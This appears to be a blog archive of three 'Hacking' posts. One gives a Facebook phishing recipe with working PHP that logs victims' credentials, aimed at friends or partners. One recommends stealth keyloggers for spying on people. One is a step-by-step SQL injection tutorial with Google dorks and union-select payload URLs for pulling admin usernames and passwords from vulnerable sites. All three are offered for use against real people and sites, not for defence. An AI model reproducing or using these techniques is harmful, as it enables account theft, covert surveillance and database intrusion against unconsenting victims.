Hack a Facebook Account

Hello,

Today we will have a look on Facebook hacking. Facebook is now a populated social network. I’m sure there are a lot of people out wondering how to hack a Facebook account. People usually want to hack their friends or their bf/gf’s Facebook account. Lets have a look on how to hack your friends facebook account.

We will hack facebook accounts through Phishing. In this method, you will create a fake facebook login page that exactly looks like the original Facebook login page and send the fake page to the victim through email or any other method. When the victim enters his email id and Facebook password, his email id and password will be sent to a specified address defined by you.

Lets get into work:

>> Go to www.Facebook.com to open the login page.

>> Save the login page (by pressing CTRL+s) with name “index.htm” and save as   ‘complete web page’.

>> Now open the index.htm file in Notepad.

>> Find action=”https://www.facebook.com/login.php?login_attempt=1″ method=”post” in the file and replace https://www.facebook.com/login.php?login_attempt=1 with login.php and change method=”post” to method=”get”, save the file and exit Notepad.

 

Now we will create the login.php file. Open notepad and copy the following code there:

 

<?php
header(“Location: http://www.facebook.com&#8221;);
$handle = fopen(“passes.txt”, “a”);
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

 

Now save the file named login and save as type .php

Ok, now you need site to upload the files. Don’t worry, we will use free hosting service and create a site within 5 minutes! http://www.5gbfree.com is a nice free hosting site, just go to the site and create a free account – now you have your own site. Upload the files index.htm, index_files and login.php in the same directory. Note down the url of the index.htm and send an email containing that url to the victim. Now wait. If the victim enters his email id and password in the page, then a file named passes.txt will be created in the directory where you uploaded the phishing files. Now you have victim’s id and password. Cheers!

Hope you enjoyed the trick.

Advertisements
Posted in Hacking | Tagged , | Leave a comment

Keylogging

Keylogging

Keylogging, also known as Keystroke logging, is a method of logging tracking or logging the key pressed on a keyboard. The softwares employed for this purpose are called Keyloggers. The technique of keylogging is usually used to spy on a person by recording what keys a person pressed on the keyboard. Keylogger softwares generate text files containing the keys that have been pressed.

Most of the keyloggers are designed to work in stealth mode, that means no window will be shown on the monitor and the person being tracked will not realize that his keystrokes are being logged in the background. Keyloggers are usually activated by pressing a combination of secret keys, which makes the invisible keylogger window visible. Some keyloggers also have the feature of sending the log file to a specified email address in the background, allowing to spy on somebody from remote.

Hardware-based keyloggers are also available, but software-based keyloggers are more popular.

Many free and paid keyloggers are available on the internet. Some excellent and FREE keyloggers are listed below:

1) Actual Keylogger: It runs hidden in the background and automatically records all keystrokes (including Alt, Ctrl and other functional buttons). The interface can be password protected and the log files are encrypted. You can view the reports as HTML or plain text. In the hidden mode it is invisible in all operating systems. This free keylogger will be really helpful to both the system administrators and home users.

Get it from here

2) Ultimate Keylogger Free: KRyLack Ultimate Keylogger Free Edition is a free popular all-round monitoring solution. It runs in the background and monitors all typed keystrokes, applications, passwords, clipboard, email, and visited websites’ URLs. You can view the reports as HTML files. Ultimate Keylogger Free Edition will help you to find out, what exactly took place in the system.

Get it from here

3) Kidlogger: Another free keylogger and spying tool. Get it here.

Posted in Hacking | Tagged , , , , | Leave a comment

Hacking Websites: SQL Injection Step by Step

Hello Hackers,

Whats up? A major target for hackers are websites, the vulnerable ones. Today we will have a look at a popular method to hack websites, this method is called SQL injection

Talking about sql (standard query language), it’s a query language used to manipulate databases of MySQL, Oracle etc. We will use simple sql queries to steal data from sites.

Difficulty: EASY

Below is a step by step guide to penetration:

STEP-1: Find vulnerable websites:

We will use Google Dork commands to find vulnerable sites. Type any of the following queries as Google search query-

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

You may download list of dorks from http://www.ziddu.com/download/13161874/A…t.zip.html to try.

Now, you have a list of websites as search result. You’ll have to visit them one by one to check if they are vulnerable.

But if you are going to hack a particular site, then try at Google search:

Site:www.targetsite.com dork_commands

Replace ‘targetsite’ with your desired site and dork_commands with dork commands, for example:

Site:www.targetsite.com inurl:index.php?id=

STEP-2: Check for vulnerablility:

Add a ' (single quotation mark) at the end of the url (no space between the url and the mark) at browser’s address bar and hit ENTER,

For example:

http://www.targetsite.com/index.php?id=2'

If any sql-related error is shown as a result, then YOU HAVE A CHANCE!!! PROCEED ON.

STEP-3: Find the number of columns in the database:

Replace the quotation mark (') with

order by n

each time replace n with 1,2,3,4 and so on, until you get an error like unknown column.

 

For example, try these urls one after one until you get a ‘unknown column’ error:

http://www.targetsite.com/index.php?id=2 order by 1

http://www.targetsite.com/index.php?id=2 order by 2

http://www.targetsite.com/index.php?id=2 order by 3

http://www.targetsite.com/index.php?id=2 order by 4

 

If you get the ‘unknown column’ error at, say n=6, then there are actually (n-1)=(6-1)=5

total columns in the table.

 

N.B. If the above url does not work, then add --” after n;

for example,

http://www.targetsite.com/index.php?id=2 order by 1--

http://www.targetsite.com/index.php?id=2 order by 2--

 

 

STEP-4: Find vulnerable columns:

Replace “order by n” with “union select columns_sequence” to find vulnerable columns,

for example, assuming we got 5 columns at the previous step,

http://www.targetsite.com/index.php?id=2 union select 1,2,3,4,5--

 

As a result, some values (must be less than or equal to  the total numbers of columns) will be shown, like the one below:

 

3Query was empty

That means column no. 3 is vulnerable! We will use the number 3 in the next step.

N.B. If the above url not working then try this:

http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5--

 

or try this one:

http://www.targesite.com/index.php?id=2 union all select 1,2,3,4,5/*

 

 

 

STEP-5: Find the database version:

Replace the vulnerable column (no 3 in this example) with version() in the url,

for example,

http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5--

 

Database version will be displayed.

 

N.B. If the above url does not work, try this:

http://www.targesite.com/index.php?id=2 union all select 1,2,@@version(),4,5/*

 

if “union+illegal mix of collatios (IMPLICIT+COERCIBLE)” is shown, the do either (a) or (b)-

(a) Evaluate the MySql version in this way:

http://www.targesite.com/index.php?id=2 union all select 1,2,convert(@@version using latin1),4,5/*

 

(b) Evaluate the MySql version in this way:

http://www.targesite.com/index.php?id=2 union all select 1,2,unhex(hex(@@version)),4,5/*

 

 

STEP-6: Find the tablename:

Assuming that we got database version 5 or 5+ from Step-5, in our url, replace 3 with “group_concat(table_name)” and add at the end of the url “from information_schema.tables where table_schema=database()”

 

for example,

http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--

 

A list containing the table names will be displayed. Find the names like ‘admin’ or ‘user’ or similar one. Say, we’ve found the tablename ‘admin’.

STEP-7: Find the column name:

Convert the table name(table name is ‘admin’ in our example) to MySql CHAR() string using HackBar addon in Firefox:

 

In the Firefox browser, install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Now select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name here:

click ok

As a result, CHAR(numbers separated with commans) will be displayed in the Hack toolbar:

Now, in the url,  replace “group_concat(table_name) with the “group_concat(column_name)” and replace “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–”

but replace “mysqlchar()” with CHAR(number, number, number, number)

for example,

http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

A list of column names will be shown, like the following:

admin,password,admin_id,admin_password,username,password… etc.

Now replace “group_concat(column_name) ” with group_concat(columnname,0x3a,anothercolumnname)

here, “columnname” should be replaced by a listed column name and
“anothercolumnname” should be replaced by another listed column name;

and replace “from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with “from table_name”

for example,

http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5 from admin--

 

If “column not found” is shown, try with different column names from the obtained list.

Finally, you’ll have the username and password list.

Hope you enjoyed the operation. Thanks for reading.

Aside | Posted on by | Tagged , | Leave a comment